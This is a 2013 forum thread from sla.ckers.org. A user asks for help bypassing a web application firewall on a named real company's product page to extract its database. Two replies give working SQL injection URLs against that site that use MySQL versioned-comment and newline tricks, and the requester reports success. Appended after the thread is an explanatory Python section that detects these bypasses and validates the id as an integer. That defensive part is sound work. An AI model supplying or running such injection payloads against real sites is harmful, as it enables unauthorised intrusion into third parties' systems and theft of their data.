Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
how to bypass this WAF can u help plz
Posted by: versus
Date: April 16, 2013 05:24PM

this vuln url :
http://www.cobra.com.dz/produits_cat_detail.php?id=325'

Une erreur est survenue 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'325 AND actif=1' at line 1 Veuillez contacter votre administrateur

with the sqlmap command check-waf: it's protected, no way to get the databases. how to bypass it? plz

Re: how to bypass this WAF can u help plz
Posted by: ajkaro
Date: April 17, 2013 03:25AM

Use this:
http://www.cobra.com.dz/produits_cat_detail.php?id=325 and 0 /*!50000union*/ /*!50000select*/ 1,2,3,version(),version()-- -

version: 5.5.23-55

Re: how to bypass this WAF can u help plz
Posted by: versus
Date: April 17, 2013 11:26AM

thanks men ;)

all okay, thanks a lot



Edited 2 time(s). Last edit at 04/18/2013 03:08PM by versus.

Re: how to bypass this WAF can u help plz
Posted by: hack2012
Date: April 18, 2013 01:38AM

http://www.cobra.com.dz/produits_cat_detail.php?id=-325 /*!%0aUNION*/ /*!%0aSELECT*/ 1,2,3,version(),5--

Re: how to bypass this WAF can u help plz
Posted by: versus
Date: April 18, 2013 12:01PM

thanks hack2012

all okay, thanks men :) ;)



Edited 1 time(s). Last edit at 04/18/2013 03:08PM by versus.
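
Seen from the defending side, both replies in this thread work because MySQL executes the body of `/*! ... */` comments while a keyword filter reads them as inert comment text. The following is an added example, not code from the thread or from any WAF product: it normalizes a parameter value to what the MySQL parser would see before matching, and shows the real fix for a numeric `id`, which is to accept digits only. All function names and the sample values (shaped like the requests above) are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*! ... */ and /*!50000 ... */ comments,
# so a filter must unwrap them rather than skip them.
_EXEC_COMMENT = re.compile(r"/\*!(?:\d{5,6})?(.*?)\*/", re.S)
_PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")


def naive_match(raw: str) -> bool:
    """Keyword filter on the raw value: the kind of rule that was bypassed."""
    return bool(re.search(r"union\s+select", raw, re.I))


def normalize(raw: str) -> str:
    """Reduce a raw query-string value to what the MySQL parser would see."""
    text = unquote_plus(raw)                   # %0a becomes a newline
    text = _EXEC_COMMENT.sub(r" \1 ", text)    # keep executable comment bodies
    text = _PLAIN_COMMENT.sub(" ", text)       # ordinary comments act as spaces
    return re.sub(r"\s+", " ", text).strip().lower()


def is_suspicious(raw: str) -> bool:
    return bool(_UNION_SELECT.search(normalize(raw)))


def parse_id(raw: str) -> int:
    """Application-side fix for a numeric parameter: digits only, else reject."""
    value = unquote_plus(raw).strip()
    if not re.fullmatch(r"\d{1,10}", value):
        raise ValueError("id must be an unsigned integer")
    return int(value)


# Constructed sample values for the id parameter.
SAMPLES = [
    "325",
    "325 and 0 /*!50000union*/ /*!50000select*/ 1,2,3",
    "-325 /*!%0aUNION*/ /*!%0aSELECT*/ 1,2,3",
]


def scan(values):
    """Return (value, naive_hit, normalized_hit) for each sample."""
    return [(v, naive_match(v), is_suspicious(v)) for v in values]


if __name__ == "__main__":
    for row in scan(SAMPLES):
        print(row)
```

Normalization only improves detection; the error message in the first post shows the value reaching the query in a numeric context, so validating it as an integer (or binding it as a typed parameter) is what removes the injection.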
